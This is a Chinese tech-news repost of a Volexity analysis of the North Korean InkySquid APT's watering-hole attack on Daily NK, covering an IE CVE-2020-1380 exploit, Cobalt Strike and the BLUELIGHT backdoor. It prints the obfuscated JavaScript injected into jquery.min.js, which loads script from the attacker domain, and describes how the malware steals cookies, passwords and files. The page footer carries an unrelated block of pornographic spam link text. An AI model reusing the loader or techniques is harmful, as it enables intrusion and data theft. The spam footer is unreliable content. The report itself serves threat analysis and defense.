《電子技術應用》
您所在的位置:首頁 > 通信與網絡 > 業界動態 > 朝鮮InkySquid APT組織利用瀏覽器漏洞感染受害者

朝鮮InkySquid APT組織利用瀏覽器漏洞感染受害者

2021-08-28
來源:嘶吼專業版
關鍵詞: 瀏覽器 漏洞感染

  朝鮮InkySquid APT組織利用瀏覽器漏洞感染受害者。

  2021年4月,Volexity研究人員識別出了通過www.dailynk[.]com網站加載到惡意子域名的jquery[.]services可疑代碼。加載惡意代碼的URL包括:

  hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

  hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

  這些URL指向的是Daily NK網站使用的合法文件,但是內容被攻擊者修改了,其中包含重定向用戶從攻擊者控制的域名jquery[.]services加載惡意JS。攻擊者控制的代碼只加入了很短的時間就被移除了,使得攻擊者活動的識別變得非常困難。

  CVE-2020-1380

  Volexity研究人員發現攻擊者利用的首個漏洞是CVE-2020-1380,一個IE 0 day漏洞利用。攻擊者在Daily NK網站的下述合法文件中加入了一行代碼:

  hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1

  加入到Daily NK網站的混淆的代碼如下:

  function vgrai(){var e=document.createElement(“script”);e.src=fecet(“w6625I》7x=y37t4;=5t48xrt5>4t52105x8t<t:6t0s=/x0=y5”,15),document.head&&document.head.appendChild(e)}function vdgie(){const e=window.navigator.userAgent,t=e.indexOf(“rv:11.0 ”),i=e.indexOf(“Trident/”);return t>0||i>0}vdgie()&&vgrai();

  加入以上代碼后,如果用戶用IE來訪問Daily NK,頁面就會從以下URL加載其他的JS文件:

  hxxps://ui.jquery[.]services/responsive-extend.min.js

  請求時,由于有正確的IE User-Agent,主機就會作為其他混淆的JS代碼。初始重定向后,攻擊者會選擇將惡意代碼隱藏在合法代碼中。在本例中,攻擊者使用了“bPopUp” JS庫。這一選擇具有2個結果:

  分析JS的人可能會誤認為其是合法的,因為大多數代碼都是非惡意的;

  識別惡意JS代碼的自動化解決方案也可能會誤認為這些代碼是非惡意的,因為代碼大部分可以與合法庫內容匹配。

  攻擊者使用的漏洞利用代碼中還包含許多混淆在變量中的字符串,以使其顯得像合法的SVG內容。攻擊者隱藏字符串的示例如圖1所示:

  圖 1. SVG變量中混淆的字符串

  為解密這些字符串,需要執行以下步驟:

  通過M43.2字符串將path變量中的d屬性中的數據分割開來;

  將分割出的數據的每個元素通過空格符再次分割,會得到一個數字列表;

  將這些數字轉成整數;

  如果整數大于30,就減去17,并加到生成的字符串中。如果整數小于等于30,就丟棄該數字。

  總的來看,一共使用了3個假的SVG對象。一旦這些對象中的字符串替換為JS,識別漏洞利用就很容易了。解密和替換后的代碼如圖2所示:

  圖 2. CVE-2020-1380實現

  代碼對應的是TrendMicro研究人員發布的CVE-2020-1380漏洞PoC代碼。

  成功利用后,JS會使用相同的方法來解密最終的SVG變量,最終生成一個十六進制編碼的Cobalt Strike stager,然后解碼和執行。本例中,下載其他shellcode的URL包括:

  hxxps://ui.jquery[.]services/swipeout.min.js

  hxxps://ui.jquery[.]services/swipeout.min.css

  hxxps://ui.jquery[.]services/slider.min.css

  BLUELIGHT

  在另一個樣本中,攻擊者使用jquery[.]services子域名來存放一個新的惡意軟件家族。文件存放位置為:

  hxxps://storage.jquery[.]services/log/history

  history文件是一個XOR編碼的定制惡意軟件副本,惡意軟件開發者和Volexity都將其命名為BLUELIGHT。命名依據是惡意軟件PDB字符串:

  E:\Development\BACKDOOR\ncov\Release\bluelight.pdb

  BLUELIGHT是Cobalt Strike成功傳播后的第二個payload。BLUELIGHT惡意軟件使用不同的云服務提供商作為C2。惡意軟件樣本使用Microsoft Graph API進行C2操作。最開始的時候,BLUELIGHT使用硬編碼的參數來進行oauth 2 token認證。客戶端認證后,BLUELIGHT就會在OneDrive appfolder文件夾下創建子目錄,創建的子目錄名有:

  logo

  normal

  background

  theme

  round

  文件夾和子目錄建立后,就會以JSON對象的格式來收集以下信息:

  用戶名

  計算機名

  操作系統版本

  Web IP

  默認接口的本地IP

  本地時間

  植入的二進制文件是32位還是64位

  進程SID授權登記

  進程文件名

  安裝的反病毒軟件列表

  受感染的機器是否運行虛擬機

  這些數據會經過XOR編碼為一個二進制blob并上傳。所有上傳的文件都會以。jpg作為擴展,不同的子目錄和文件名表明不同類型的命令數據。

  C2循環在初始上傳偵查數據后開始,大約30秒循環一次。前5分鐘內,每個循環會截圖,并以時間戳作為文件名上傳到normal子目錄。5分鐘后,截圖每隔5分鐘上傳一次。

  在每個循環中,客戶端會通過美劇background子目錄來查詢新的命令。文件名表明要執行的命令,文件的內容提供命令相關的進一步信息。支持的命令包括:

  執行和下載shellcode

  下載和啟動可執行文件,然后上傳程序輸出

  獲取IE、Edge、Chrome、Naver Whale等支持的瀏覽器中的cookie和密碼數據庫

  遞歸檢索路徑和上傳文件元數據;

  產生一個進程來遞歸檢索路徑,以zip文件形式上傳文件;

  中止文件上傳線程。

  卸載。

  命令文件在處理后會被刪除,大多數命令生成的文件會上傳到round目錄。但zip upload會使用theme子目錄。




電子技術圖片.png

本站內容除特別聲明的原創文章之外,轉載內容只為傳遞更多信息,并不代表本網站贊同其觀點。轉載的所有的文章、圖片、音/視頻文件等資料的版權歸版權所有權人所有。本站采用的非本站原創文章及圖片等內容無法一一聯系確認版權者。如涉及作品內容、版權和其它問題,請及時通過電子郵件或電話通知我們,以便迅速采取適當措施,避免給雙方造成不必要的經濟損失。聯系電話:010-82306118;郵箱:aet@chinaaet.com。
主站蜘蛛池模板: 免费国产小视频在线观看 | 日本无遮挡亲吻膜下面免费 | 日韩欧美一区在线观看 | 欧美亚洲另类在线 | 黄色网址在线播放 | 真实国产乱弄免费视频 | 日韩a级毛片免费视频 | 美女视频黄的全免费网站 | 国产精品一在线观看 | 国产一区二区三区不卡免费观看 | 视频一区二区三区自拍 | 午夜精品视频在线 | 亚洲韩国日本欧美一区二区三区 | 日韩高清在线免费看 | 日本大片久久久高清免费看 | 国产成人精品高清在线 | 激情五月网站 | tom影院亚洲国产一区二区 | 欧美怡红院在线观看 | 国产一区二区三区免费在线视频 | 午夜在线播放免费人成无 | 成人免费在线看片 | 激情五月婷婷综合网 | 天天澡天天摸天天添视频 | 丁香婷婷综合五月综合色啪 | 五月婷婷六月爱 | 免费香蕉一区二区在线观看 | 久久精品五月天 | 欧美一级特黄刺激大片视频 | 成人羞羞视频在线观看免费 | 成年人免费在线视频 | 日本高清不卡码 | 亚洲九九夜夜 | 色黄大色黄女片免费看软件 | 天天操操操操操操 | 亚洲第一免费视频 | 亚洲欧美日韩精品高清 | 2018天天干天天操 | 午夜伦理片在线观看 | 天天拍拍夜夜出水 | 日韩精品中文字幕视频一区 |